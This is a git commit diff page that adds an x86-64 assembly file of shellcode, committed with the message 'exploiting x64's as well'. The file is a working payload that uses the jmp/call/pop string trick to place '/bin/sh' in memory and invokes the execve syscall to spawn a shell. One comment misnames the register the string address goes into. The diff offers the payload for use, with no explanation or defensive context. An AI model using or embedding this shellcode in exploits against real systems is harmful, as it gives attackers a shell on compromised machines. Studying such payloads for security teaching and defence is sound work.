diff options
| author | toni <matzeton@googlemail.com> | 2015-04-12 17:21:18 +0200 |
|---|---|---|
| committer | toni <matzeton@googlemail.com> | 2015-04-12 17:21:18 +0200 |
| commit | bd18cd8c67fd97f6bf0dceffae68799730ec582c (patch) | |
| tree | 43adc08e921768ac116c205444a2a6050199d245 /shellcode/execve_x64.asm | |
| parent | 48ed2c30cac4c144690ddf5e56c6b366636184f0 (diff) | |
exploiting x64's as well
Diffstat (limited to 'shellcode/execve_x64.asm')
| -rw-r--r-- | shellcode/execve_x64.asm | 20 |
1 files changed, 20 insertions, 0 deletions
diff --git a/shellcode/execve_x64.asm b/shellcode/execve_x64.asm new file mode 100644 index 0000000..6048796 --- /dev/null +++ b/shellcode/execve_x64.asm @@ -0,0 +1,20 @@ +BITS 64 + + +; do the 'string trick' +jmp short string + +code: +xor rax,rax +pop rdi ; pop the addr of the string intro esi (stack pointer register) +mov byte [rdi + 7], al ; null-terminate the string +push rdi +mov rsi,rsp +push rax +mov rdx,rsp +mov byte al,59 ; execv +syscall + +string: +call code +db '/bin/sh' , 0xFF |